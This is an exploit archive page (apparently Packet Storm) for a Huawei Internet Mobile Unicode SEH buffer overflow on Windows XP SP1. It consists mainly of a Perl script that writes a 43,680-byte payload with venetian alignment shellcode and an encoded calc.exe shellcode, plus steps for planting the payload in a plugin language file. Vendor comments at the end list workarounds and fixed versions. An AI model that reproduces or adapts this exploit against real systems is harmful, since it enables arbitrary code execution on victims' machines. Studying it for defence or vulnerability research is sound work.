exploit the possibilities

Huawei Internet Mobile Overflow

Huawei Internet Mobile Overflow
Posted Sep 16, 2012
Authored by Dark-Puzzle

Huawei Technologies Internet Mobile unicode SEH-based buffer overflow exploit. Works only on Windows XP SP1.

tags | exploit, overflow
systems | windows, xp
MD5 | 1365389cc7039d81b94991d8bd4086cc

Huawei Internet Mobile Overflow

Change Mirror Download
#!/usr/bin/perl
# Title : Huawei Technologies - Internet Mobile 0day Unicode SEH Based Vulnerability .
# Author : Dark-Puzzle
# Versions : All Versions Are Vulnerable , The behavior of the program when exploiting may vary from an OS to another OS .
# Vulnerable By Vendor : Morocco - Meditel 3G & Maroc Telecom 3G .
# RISK : Critical .
# Type : Local / Remote.
######################################################
# Video : https://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7 )
#####################################################
#---------------------------------------------------------------------
# Use it at your own risk #
###---------------------------------------------------------------------
# Info : This exploit works only on WinXP SP1 because it is almost impossible to execute it on Win7 & WinXP SP2/SP3 cause This program has been compiled with SafeSEH enabled .
# So in other versions of Windows you will not find any valid UNICODE addresses (No SafeSEH) neither in OS modules nor in Program Modules .
# That's why I Will give you just an Idea about Win7 XP Sp1/Sp2. ( Look DOWN ) !
# Anyway this exploit works perfectly on Windows XP SP1 .
# Here it is , the video explain the usage =) : http://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7 )
###

# How to use this exploit On Windows XP SP1 . watch my video :
# So first go to C:\program files\Internet Mobile\plugins\SMSUIPlugin\SMSUIPlugin_fr-fr.lang or _en-fr.lang (according to the program language)
# Then put the output of this perl program in <item name="IDS_PLUGIN_NAME">HERE !!</item> . Save it open the program .
# Not like Win7 & WinXP SP2/SP3 this exploit requires you to click from the to menu "Operation" --> "Message texte" !! Bingo . Calc.exe Just Showed Up =) .
# English :"Operation" --> "Text Message"

my $size = 43680;
my $junk = "A" x 146 ;
my $nseh = "\x61\x62"; # Popad + Align .
my $seh = "\x88\xDC"; # p/p/r From OLE32.DLL ( Windows XP SP1 Only)
# The Venetian Shellcode :
my $ven =
"\x6e". # Align Code
"\x53". # push ebx
"\x6e". # Align Code
"\x58". # pop eax
"\x6e". # Align Code
"\x05\x17\x11". # add eax, 0x11001700
"\x6e". # Align Code
"\x2d\x16\x11". # sub eax, 0x11001600
"\x6e". # Align Code
"\x50". # push eax
"\x6e". # Align Code
"\xc3"; # ret

my $more = "D" x 108 ; # Exact Value To Make the Venetian shellcode work.

# CALC.exe Shellcode .
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPA3QADAZA".
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
"QQ2LRCM0LJA";


my $morestuff = "D" x ( 43680 - length($junk.$nseh.$seh));
$payload = $junk.$nseh.$seh.$ven.$more.$shellcode.$morestuff;
open (myfile,'>mobile.txt');
print myfile $payload;
close(myfile);
print "This Program has written ".length($payload)." bytes\n";

##########################################################
# For Windows XP SP 2 / SP 3 and Windows 7 32/64 bits Remove the Upper script and # in each script line .
##########################################################
# When Changing the value of <item name="IDS_PLUGIN_NAME"></item> the program crashes directly when it is opened and act differently than WinXP SP1 .

#my $totalsize = 43680 ;
#my $junk = "A" x 182 ;
#my $nseh = "\x42\x42"; # Overwriting the pointer to next SEH with 0x42004200
#my $seh = "\x43\x43"; # Overwriting SEH with 0x43004300
#my $morestuff = "D" x ( 43680-length($junk.$nseh.$seh));

#$payload= $junk.$nseh.$seh.$morestuff;
#open(myfile,'>mobile.txt');
#print myfile $payload;
#close(myfile);
#print "Wrote ".length($payload)." bytes\n";

#############################################################


















# Datasec Team .

Comments (3)

RSS Feed Subscribe to this comment feed
psirt2012

Currently, workarounds are available and are listed below. Huawei has also made the version plan to resolve this vulnerability.

Temporary Fix:
Users of Windows can upgrade the operation system to Windows XP sp3 directly or can download UTPS2.0 from our web site to cope with the security vulnerability.
1. Users of Windows XP sp1 can log in to the Web site of Microsoft to install the patch Windows XP sp3.
2. Users of the operation systems of higher versions will not be affected.

Software Versions and Fixes:
The below affected products can deploy the workarounds mentioned above to mitigate the risks, or be upgraded to the below versions:
Product Model Back-End Version Solved Version Solved Time
E173u-1 UTPS11.302.09.06.162 UTPS21.005.22.00.162_MAC21.005.22.01.162 2012-9-26
E153u-1 UTPS11.302.09.05.162 UTPS21.005.15.06.162_MAC21.005.15.01.162 2012-9-26

The other affected products can deploy the workarounds mentioned above to mitigate the risks, and there is no new version or patch to be released.

Comment by psirt2012
2012-10-17 03:59:41 UTC | Permalink | Reply
psirt2012

Currently, workarounds are available and are listed below. Huawei has also made the version plan to resolve this vulnerability.

the link of Huawei Security Advisory is as below:
www.huaweidevice.com/worldwide/faq.do?me…

Temporary Fix:
Users of Windows can upgrade the operation system to Windows XP sp3 directly or can download UTPS2.0 from our web site to cope with the security vulnerability.
1. Users of Windows XP sp1 can log in to the Web site of Microsoft to install the patch Windows XP sp3.
2. Users of the operation systems of higher versions will not be affected.

Software Versions and Fixes:
The below affected products can deploy the workarounds mentioned above to mitigate the risks, or be upgraded to the below versions:
Product Model Back-End Version Solved Version Solved Time
E173u-1 UTPS11.302.09.06.162 UTPS21.005.22.00.162_MAC21.005.22.01.162 2012-9-26
E153u-1 UTPS11.302.09.05.162 UTPS21.005.15.06.162_MAC21.005.15.01.162 2012-9-26
The other affected products can deploy the workarounds mentioned above to mitigate the risks, and there is no new version or patch to be released.

Contact Channel for Technique Issue:
PSIRT@huawei.com

Comment by psirt2012
2012-10-17 04:06:47 UTC | Permalink | Reply
psirt2012

Currently, workarounds are available and are listed below. Huawei has also made the version plan to resolve this vulnerability.

please check with below link:
www.huaweidevice.com/cn/faq.do?method&#6…

Comment by psirt2012
2012-10-18 07:39:01 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    9 Files
  • 23
    Aug 23rd
    3 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close